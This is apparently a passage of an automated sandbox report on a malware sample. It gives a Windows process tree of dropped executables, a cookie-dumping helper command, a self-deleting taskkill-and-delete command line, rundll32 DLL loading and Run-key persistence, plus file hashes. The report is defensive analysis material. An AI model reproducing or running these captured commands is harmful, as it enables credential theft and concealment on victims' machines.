                                                                                                                    PID:1980
                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5884.3.935277561\596636499" -childID 1 -isForBrowser -prefsHandle 6176 -prefMapHandle 6172 -prefsLen 733 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5884 "\\.\pipe\gecko-crash-server-pipe.5884" 6188 tab
                                                                                                                    10⤵
                                                                                                                      PID:5876
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                  8⤵
                                                                                                                    PID:2240
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffe009d4f50,0x7ffe009d4f60,0x7ffe009d4f70
                                                                                                                      9⤵
                                                                                                                        PID:5680
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:2
                                                                                                                        9⤵
                                                                                                                          PID:5528
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1932 /prefetch:8
                                                                                                                          9⤵
                                                                                                                            PID:4156
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1912 /prefetch:8
                                                                                                                            9⤵
                                                                                                                              PID:5628
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1
                                                                                                                              9⤵
                                                                                                                                PID:5752
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2592 /prefetch:1
                                                                                                                                9⤵
                                                                                                                                  PID:5500
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                                                                                                                  9⤵
                                                                                                                                    PID:2260
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
                                                                                                                                    9⤵
                                                                                                                                      PID:5572
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
                                                                                                                                      9⤵
                                                                                                                                        PID:972
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
                                                                                                                                        9⤵
                                                                                                                                          PID:716
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 /prefetch:8
                                                                                                                                          9⤵
                                                                                                                                            PID:5720
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                                                            9⤵
                                                                                                                                              PID:3028
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff777b0a890,0x7ff777b0a8a0,0x7ff777b0a8b0
                                                                                                                                                10⤵
                                                                                                                                                  PID:4344
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3556 /prefetch:8
                                                                                                                                                9⤵
                                                                                                                                                  PID:5540
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8
                                                                                                                                                  9⤵
                                                                                                                                                    PID:4432
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4256 /prefetch:8
                                                                                                                                                    9⤵
                                                                                                                                                      PID:3884
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1712,12651857550529823949,14841184494660905081,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3552 /prefetch:2
                                                                                                                                                      9⤵
                                                                                                                                                        PID:5756
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "cmd.exe" /C taskkill /F /PID 5900 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Bq3ftg5GR8z3kA11ehncmFWZ.exe"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:1312
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /F /PID 5900
                                                                                                                                                          9⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:5724
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "cmd.exe" /C taskkill /F /PID 5900 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Bq3ftg5GR8z3kA11ehncmFWZ.exe"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:3024
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /F /PID 5900
                                                                                                                                                            9⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:6132
                                                                                                                                                    • C:\Users\Admin\Documents\0qUg88eVQUzQP9L37gzMK6PP.exe
                                                                                                                                                      "C:\Users\Admin\Documents\0qUg88eVQUzQP9L37gzMK6PP.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2108
                                                                                                                                                      • C:\Users\Admin\Documents\0qUg88eVQUzQP9L37gzMK6PP.exe
                                                                                                                                                        C:\Users\Admin\Documents\0qUg88eVQUzQP9L37gzMK6PP.exe
                                                                                                                                                        7⤵
                                                                                                                                                          PID:1248
                                                                                                                                                      • C:\Users\Admin\Documents\LcbXdOmNshm6UY4XTcjt3kQP.exe
                                                                                                                                                        "C:\Users\Admin\Documents\LcbXdOmNshm6UY4XTcjt3kQP.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3764
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 788
                                                                                                                                                          7⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:4908
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:4056
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_6.exe
                                                                                                                                                      sonia_6.exe
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:2212
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        6⤵
                                                                                                                                                          PID:2116
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:396
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                          6⤵
                                                                                                                                                            PID:2372
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            6⤵
                                                                                                                                                              PID:5580
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1236
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 544
                                                                                                                                                            4⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:2440
                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:512
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:3928
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4204
                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 4204 -s 496
                                                                                                                                                            3⤵
                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:4876
                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                          2⤵
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          PID:208
                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                        1⤵
                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:360
                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                          2⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Modifies registry class
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:2256
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D7BA.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D7BA.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4412
                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5820
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DA0C.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\DA0C.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4592
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DA0C.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\DA0C.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5260
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E400.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E400.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5668
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\EEDE.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\EEDE.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5268
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FBFF.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\FBFF.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4932
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CC9.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\CC9.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5908
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\12C5.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\12C5.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5384
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1527.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1527.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:204
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\175B.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\175B.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5704
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\26AE.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\26AE.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4672
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5500
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5492
                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:1428
                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5304
                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1840
                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5800
                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4692
                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3564
                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4760

                                                                                                                                                                                                Network

                                                                                                                                                                                                MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                Downloads

                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  105020a5adae7d6d8a50cb75abd6e3ec

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  2d799b226bfa04761f770bb53fe535bdf138aa5f

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  01aaaa7500eeeb4b4abcf335a91dc743d0b8185690317bbfd8cc1f9acd68f6dd

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  3a08502f3f519740413306f728a342135c9cfa03b25e2b77e84e4f2ca3fe0240a2fe7d5464c2ebca7a1b6a9336966c9ef85092bea2670f85fd7c3d9f2375f33d

                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  7c81a9d4c9ada948ecce81d00683f89a

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  48eb25b0e6def56d7fe86a83f07bfd71cf6d73a5

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  9c2a3f8909872cb65d373b751ce0944378322d616cef2f7fd3afef5731d6cc92

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  e08731117ed5eaf83e1d2417f98a16a9052108612812d503f139910c53653ce0bc010face0b34e602067bd810e893e6eb87eae1bf313855a75fb411e36a164bb

                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  03f1320d0f69699ccf5cd56168ca99ac

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  e2d72e257b4505daa608dbef67ccf3ec6f9d4d5f

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  79762717b9439239e803f39a8559b4201001a01b0a12df17587412e4d5edf128

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  1b1385c0363c601663a5280e13a91425819c4cb1f63d70361aaf54a4302692c2647bdceae5eec7a2eaff1e6ec6a2cd6be3985890f8a65fdecb5ac09af20cff1f

                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  ab4def93cd62e044222369dd5232f8ee

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  5860ac75937b4d9cc94c6a3d25cbf5351cff3291

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  9f15fda54210016a97e000e36083dfeec7cb28bbaa7d7aa61ca9d4dd518a2f70

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  72912d2c78d94808edc498c75aae57b44aa80a8c0d2f36adc1e91744b9ec611c56bd9720a008b5604fa86abd4ee2cda6ae7d7502431f2db7817d32452c88a9bd

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\libcurl.dll
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\libcurlpp.dll
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\libgcc_s_dw2-1.dll
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\libstdc++-6.dll
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\libwinpthread-1.dll
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\setup_install.exe
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\setup_install.exe
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0787B454\sonia_1.exe
                                                                                                                                                                                                  MD5

                                                                                                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

